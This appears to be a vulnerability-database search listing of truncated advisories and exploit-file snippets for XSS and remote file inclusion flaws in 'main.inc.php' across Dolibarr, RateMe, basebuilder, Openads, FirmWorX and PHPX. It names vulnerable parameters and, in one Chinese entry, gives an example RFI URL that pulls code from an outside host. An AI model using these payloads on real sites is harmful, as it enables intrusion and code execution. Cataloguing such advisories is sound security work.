Cross-site Scripting (XSS)

dolibarr/dolibarr is vulnerable to Cross-Site Scripting. The vulnerability is due to a lack of sanitization for the key variable in the topmenu function within main.inc.php. This allows an attacker to insert malicious JavaScript code into the key variable resulting in Cross-Site Scripting...

Dolibarr ERP and CRM contain XSS Vulnerability

The testsqlandscriptinject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS...

GHSA-QJQ9-WX5J-JRG6 Dolibarr ERP and CRM contain XSS Vulnerability

The testsqlandscriptinject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS...

basebuilder <= 2.0.1 (main.inc.php) Remote File Inclusion Vulnerability

No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ dunatstrcpy.pl basebuilder = 2.0.1 Remote File Inclusion Vulnerability Script site:...

RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability

No description provided by source. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ...,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;::...

openads-2.0.11 - Remote File Inclusion

openads-2.0.11 - Remote File Inclusion Exploit Title: Openads-2.0.11 Remote File inclusion Vulnerability Google Dork: Just open you eyes ; Date: 02/09/2011 Author: HaCkErS eV!L E-mail:[email protected] Software Link:...

openads-2.0.11 - Remote File Inclusion

Exploit Title: Openads-2.0.11 Remote File inclusion Vulnerability Google Dork: Just open you eyes ; Date: 02/09/2011 Author: HaCkErS eV!L E-mail:[email protected] Software Link: http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download...

basebuilder-rfi.txt

:::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ "Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP" "YmmMMMM"" MMM YM Discovered by dun \ dunatstrcpy.pl basebuilder = 2.0.1 Remote File Inclusion Vulnerability Script site: http://basebuilder.sourceforge.net/ Download:...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in FirmWorX 0.1.2 allow remote attackers to execute arbitrary PHP code via a URL in the 1 bankdataroot parameter to modules/bank/includes/design/main.inc.php, or the 2 fmdataroot parameter to a includes/config/master.inc.php or b...

rateme-rfi.txt

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;...

PanetLuc.Com RateMe Main.Inc.PHP远程文件包含漏洞

RateMe是一款基于PHP的WEB应用程序。 RateMe不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Main.Inc.PHP'脚本对用户提交的'pathtoscript'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 planetluc.com RateMe 1.3.2 目前没有详细解决方案提供： http://www.planetluc.com/ http://www.example.com/path/main.inc.php?pathtoscript=www.example2.com...

RateMe &lt;= 1.3.2 (main.inc.php) Remote File Include Vulnerability

No description provided by source. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ...,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;::...

RateMe &lt;= all versions =&gt; &#40; main.inc.php &#41; Remote File Include Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ...,,:: ;;ii,,:: + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;i...

RateMe 1.3.2 - &#039;main.inc.php&#039; Remote File Inclusion

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ...,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,,...

RateMe 1.3.2 - main.inc.php Remote File Inclusion

RateMe 1.3.2 - main.inc.php Remote File Inclusion +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ...,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii...

RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================ RateMe = 1.3.2 main.inc.php Remote File Include Vulnerability ================================================================...

CVE-2004-0248

CVE-2004-0248 describes a cross-site scripting (XSS) vulnerability in PHPX 3.2.3. The issue allows remote attackers to run arbitrary script as another user by injecting HTML or script into three inputs: the keywords argument of main.inc.php, the body argument of help.inc.php, or the subject field...